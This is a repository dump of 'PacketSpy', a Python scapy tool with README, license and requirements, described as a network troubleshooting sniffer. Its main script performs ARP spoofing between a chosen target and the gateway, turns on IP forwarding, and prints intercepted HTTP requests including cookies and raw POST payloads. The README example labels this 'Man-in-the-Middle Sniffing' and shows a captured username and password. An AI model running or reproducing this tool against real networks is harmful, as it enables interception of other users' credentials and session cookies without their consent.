├── LICENSE
├── Readme.md
├── img
    └── packetspy.png
├── packetspy.py
└── requirements.txt


/LICENSE:
--------------------------------------------------------------------------------
 1 | MIT License
 2 | 
 3 | Copyright (c) 2023 Halil Ibrahim Deniz
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy
 6 | of this software and associated documentation files (the "Software"), to deal
 7 | in the Software without restriction, including without limitation the rights
 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in
13 | all copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
21 | THE SOFTWARE.


--------------------------------------------------------------------------------
/Readme.md:
--------------------------------------------------------------------------------
  1 | # PacketSpy
  2 | 
  3 | <img src="img/packetspy.png"></img>
  4 | 
  5 | ## Description
  6 | PacketSpy is a powerful network packet sniffing tool designed to capture and analyze network traffic. It provides a comprehensive set of features for inspecting HTTP requests and responses, viewing raw payload data, and gathering information about network devices. With PacketSpy, you can gain valuable insights into your network's communication patterns and troubleshoot network issues effectively.
  7 | 
  8 | <h4 align="center">
  9 | <br>
 10 |    <a href="https://buymeacoffee.com/halildeniz" target="_blank"><img src="https://cdn.buymeacoffee.com/buttons/default-orange.png" alt="Buy Me A Coffee" height="41" width="174"></a>
 11 | </h4>
 12 | 
 13 | ## Features
 14 | - **Packet Capture**: Capture and analyze network packets in real-time.
 15 | - **HTTP Inspection**: Inspect HTTP requests and responses for detailed analysis.
 16 | - **Raw Payload Viewing**: View raw payload data for deeper investigation.
 17 | - **Device Information**: Gather information about network devices, including IP addresses and MAC addresses.
 18 | 
 19 | ## Installation
 20 | ```
 21 | git clone https://github.com/HalilDeniz/PacketSpy.git
 22 | ```
 23 | 
 24 | ## Requirements
 25 | PacketSpy requires the following dependencies to be installed:
 26 | ```
 27 | pip install -r requirements.txt
 28 | ```
 29 | 
 30 | ## Getting Started
 31 | To get started with PacketSpy, use the following command-line options:
 32 | 
 33 | ```
 34 | root@denizhalil:/PacketSpy# python3 packetspy.py --help                          
 35 | usage: packetspy.py [-h] [-t TARGET_IP] [-g GATEWAY_IP] [-i INTERFACE] [-tf TARGET_FIND] [--ip-forward] [-m METHOD]
 36 | 
 37 | options:
 38 |   -h, --help            show this help message and exit
 39 |   -t TARGET_IP, --target TARGET_IP
 40 |                         Target IP address
 41 |   -g GATEWAY_IP, --gateway GATEWAY_IP
 42 |                         Gateway IP address
 43 |   -i INTERFACE, --interface INTERFACE
 44 |                         Interface name
 45 |   -tf TARGET_FIND, --targetfind TARGET_FIND
 46 |                         Target IP range to find
 47 |   --ip-forward, -if     Enable packet forwarding
 48 |   -m METHOD, --method METHOD
 49 |                         Limit sniffing to a specific HTTP method
 50 | ```
 51 | 
 52 | ## Examples
 53 | 1. Device Detection
 54 | ```
 55 | root@denizhalil:/PacketSpy# python3 packetspy.py -tf 10.0.2.0/24 -i eth0
 56 | 
 57 |         Device discovery
 58 | **************************************
 59 |    Ip Address       Mac Address
 60 | **************************************
 61 |     10.0.2.1      52:54:00:12:35:00
 62 |     10.0.2.2      52:54:00:12:35:00
 63 |     10.0.2.3      08:00:27:78:66:95
 64 |     10.0.2.11     08:00:27:65:96:cd
 65 |     10.0.2.12     08:00:27:2f:64:fe
 66 | 
 67 | ```
 68 | 2. Man-in-the-Middle Sniffing
 69 | ```
 70 | root@denizhalil:/PacketSpy# python3 packetspy.py -t 10.0.2.11 -g 10.0.2.1 -i eth0
 71 | ******************* started sniff *******************
 72 | 
 73 | HTTP Request:
 74 |     Method: b'POST'
 75 |     Host: b'testphp.vulnweb.com'
 76 |     Path: b'/userinfo.php'
 77 |     Source IP: 10.0.2.20
 78 |     Source MAC: 08:00:27:04:e8:82
 79 |     Protocol: HTTP
 80 |     User-Agent: b'Mozilla/5.0 (X11; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0'
 81 | 
 82 | Raw Payload:
 83 | b'uname=admin&pass=mysecretpassword'
 84 | 
 85 | HTTP Response:
 86 |     Status Code: b'302'
 87 |     Content Type: b'text/html; charset=UTF-8'
 88 | --------------------------------------------------
 89 | ```
 90 | ## FootNote
 91 | Https work still in progress
 92 | 
 93 | ## Contributing
 94 | Contributions are welcome! To contribute to PacketSpy, follow these steps:
 95 | 1. Fork the repository.
 96 | 2. Create a new branch for your feature or bug fix.
 97 | 3. Make your changes and commit them.
 98 | 4. Push your changes to your forked repository.
 99 | 5. Open a pull request in the main repository.
100 | 
101 | ## Contact
102 | If you have any questions, comments, or suggestions about PacketSpy, please feel free to contact me:
103 | - LinkedIn: [LinkedIn](https://www.linkedin.com/in/halil-ibrahim-deniz/)
104 | - TryHackMe: [TryHackMe](https://tryhackme.com/p/halilovic)
105 | - Instagram: [Instagram](https://www.instagram.com/deniz.halil333/)
106 | - YouTube: [YouTube](https://www.youtube.com/c/HalilDeniz)
107 | - Email: halildeniz313@gmail.com
108 | 
109 | ## License
110 | PacketSpy is released under the MIT License. See [LICENSE](https://github.com/HalilDeniz/PacketSpy/blob/main/LICENSE) for more information.
111 | 


--------------------------------------------------------------------------------
/img/packetspy.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/HalilDeniz/PacketSpy/9e5218a4a11ee04e9ed850456bcff602fd2eaee8/img/packetspy.png


--------------------------------------------------------------------------------
/packetspy.py:
--------------------------------------------------------------------------------
  1 | import scapy.all as scapy
  2 | import scapy.layers.http as http
  3 | from scapy.all import ARP, Ether, srp
  4 | import sys
  5 | import argparse
  6 | from rich import print
  7 | from rich.console import Console
  8 | from rich.table import Table
  9 | import os
 10 | 
 11 | console = Console()
 12 | 
 13 | def get_mac(ip):
 14 |     arp_request = scapy.ARP(pdst=ip)
 15 |     broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
 16 |     arp_request_broadcast = broadcast / arp_request
 17 |     answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0]
 18 | 
 19 |     if answered_list:
 20 |         return answered_list[0][1].hwsrc
 21 |     else:
 22 |         return None
 23 | 
 24 | 
 25 | def arp_spoof(target_ip, spoof_ip):
 26 |     target_mac = get_mac(target_ip)
 27 |     if target_mac is None:
 28 |         print(f"[bold red]Error:[/] Could not find MAC address for target IP: {target_ip}")
 29 |         sys.exit(1)
 30 | 
 31 |     packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)
 32 |     scapy.send(packet, verbose=False)
 33 | 
 34 | 
 35 | 
 36 | def forward_packet(packet, target_ip, gateway_ip):
 37 |     # Hedef IP ve Gateway IP'ye yönlendirme
 38 |     if packet[scapy.IP].src == target_ip:
 39 |         packet[scapy.IP].dst = gateway_ip
 40 |     elif packet[scapy.IP].dst == gateway_ip:
 41 |         packet[scapy.IP].dst = target_ip
 42 |     scapy.send(packet, verbose=False)
 43 | 
 44 | def sniff_packets(interface, target_ip, gateway_ip, method=None):
 45 |     try:
 46 |         scapy.sniff(iface=interface, store=False, prn=lambda packet: process_packet(packet, target_ip, gateway_ip, method))
 47 |     except OSError as e:
 48 |         print(f"[bold red]Error:[/] {e}")
 49 |         sys.exit(1)
 50 | 
 51 | def process_packet(packet, target_ip, gateway_ip, method=None):
 52 |     if packet.haslayer(http.HTTPRequest):
 53 |         request = packet[http.HTTPRequest]
 54 | 
 55 |         # IP adresi ve MAC adresini al
 56 |         ip = packet[scapy.IP].src
 57 |         mac = packet[scapy.Ether].src
 58 | 
 59 |         if method and request.Method.decode() != method:
 60 |             return
 61 | 
 62 |         print("\n[bold blue]HTTP Request:")
 63 |         print(f"    Method: [green]{request.Method}[/green]")
 64 |         print(f"    Host: [green]{request.Host}[/green]")
 65 |         print(f"    Path: [green]{request.Path}[/green]")
 66 |         print(f"    Source IP: [green]{ip}[/green]")
 67 |         print(f"    Source MAC: [green]{mac}[/green]")
 68 |         if request.Path.startswith(b"https"):
 69 |             print(f"    Protocol: [green]HTTPS[/green]")
 70 |         else:
 71 |             print(f"    Protocol: [green]HTTP[/green]")
 72 | 
 73 |         if request.Cookie:
 74 |             print(f"    Cookie: [green]{request.Cookie}[/green]")
 75 | 
 76 |         if request.User_Agent:
 77 |             print(f"    User-Agent: [green]{request.User_Agent}[/green]")
 78 |         if packet.haslayer(scapy.Raw):
 79 |             print("\n[bold red]Raw Payload:")
 80 |             payload = packet[scapy.Raw].load
 81 |             print(f"[red]{payload}[/red]")
 82 | 
 83 |     if packet.haslayer(http.HTTPResponse):
 84 |         response = packet[http.HTTPResponse]
 85 | 
 86 |         print("\n[bold blue]HTTP Response:")
 87 |         print(f"    Status Code: [green]{response.Status_Code}[/green]")
 88 |         print(f"    Content Type: [green]{response.Content_Type}[/green]")
 89 |         print("\n" + "-"*90)
 90 | 
 91 | 
 92 | def scan(target, iface):
 93 |     arp = ARP(pdst=target)
 94 |     ether = Ether(dst="ff:ff:ff:ff:ff:ff")
 95 |     packet = ether / arp
 96 |     try:
 97 |         result = srp(packet, timeout=3, verbose=0, iface=iface)[0]
 98 |     except PermissionError:
 99 |         print("[bold red]Error:[/] You do not have sufficient privileges. Try running the program with 'sudo'.")
100 |         exit()
101 |     except OSError as e:
102 |         if "No such device" in str(e):
103 |             print(f"[bold red]Error:[/] Interface '{iface}' does not exist. \nPlease provide a valid interface name.")
104 |             exit()
105 |         else:
106 |             raise
107 | 
108 |     devices = []
109 |     for sent, received in result:
110 |         devices.append({'ip': received.psrc, 'mac': received.hwsrc})
111 | 
112 |     return devices
113 | 
114 | 
115 | def main():
116 |     parser = argparse.ArgumentParser()
117 |     parser.add_argument("-t", "--target", dest="target_ip", help="Target IP address")
118 |     parser.add_argument("-g", "--gateway", dest="gateway_ip", help="Gateway IP address")
119 |     parser.add_argument("-i", "--interface", dest="interface", help="Interface name")
120 |     parser.add_argument("-tf", "--targetfind", dest="target_find", help="Target IP range to find")
121 |     parser.add_argument("--ip-forward", "-if", action="store_true", help="Enable packet forwarding")
122 |     parser.add_argument("-m", "--method", dest="method", help="Limit sniffing to a specific HTTP method")
123 |     options = parser.parse_args()
124 | 
125 |     if options.target_find:
126 |         ip_list = scan(options.target_find, options.interface)
127 |         print("\n[bold green]Device discovery")
128 |         print("\n[red]**************************************[/red]")
129 |         print("[blue]   Ip Address\t    Mac Address[/blue]")
130 |         print("[red]**************************************[/red]")
131 |         for ip in ip_list:
132 |             print(f"    [green]{ip['ip']}[/green]\t  {ip['mac']}")
133 |         print()
134 |         sys.exit(0)
135 | 
136 |     if not options.target_ip:
137 |         parser.error("[-] Please specify a target IP address using -t or --target.")
138 |     if not options.gateway_ip:
139 |         parser.error("[-] Please specify a gateway IP address using -g or --gateway.")
140 |     if not options.interface:
141 |         parser.error("[-] Please specify the interface name using -i or --interface.")
142 | 
143 |     # Paket yönlendirme özelliğini etkinleştir
144 |     if options.ip_forward:
145 |         os.system("echo '1' > /proc/sys/net/ipv4/ip_forward")
146 | 
147 |     return options
148 | 
149 | options = main()
150 | target_ip = options.target_ip
151 | gateway_ip = options.gateway_ip
152 | interface = options.interface
153 | method = options.method
154 | 
155 | 
156 | try:
157 |     while True:
158 |         arp_spoof(target_ip, gateway_ip)
159 |         arp_spoof(gateway_ip, target_ip)
160 |         print("******************* started sniff *******************")
161 |         sniff_packets(interface, target_ip, gateway_ip, method)
162 | except KeyboardInterrupt:
163 |     print("\n[bold green]Detected Ctrl+C. Resetting ARP tables...")
164 |     # Yönlendirme tablolarını sıfırla
165 |     arp_spoof(gateway_ip, target_ip)
166 |     arp_spoof(target_ip, gateway_ip)
167 |     sys.exit(0)
168 | print("See you later honey")
169 | 
170 | 


--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
1 | scapy
2 | rich
3 | argparse
4 | ipaddress
5 | 


--------------------------------------------------------------------------------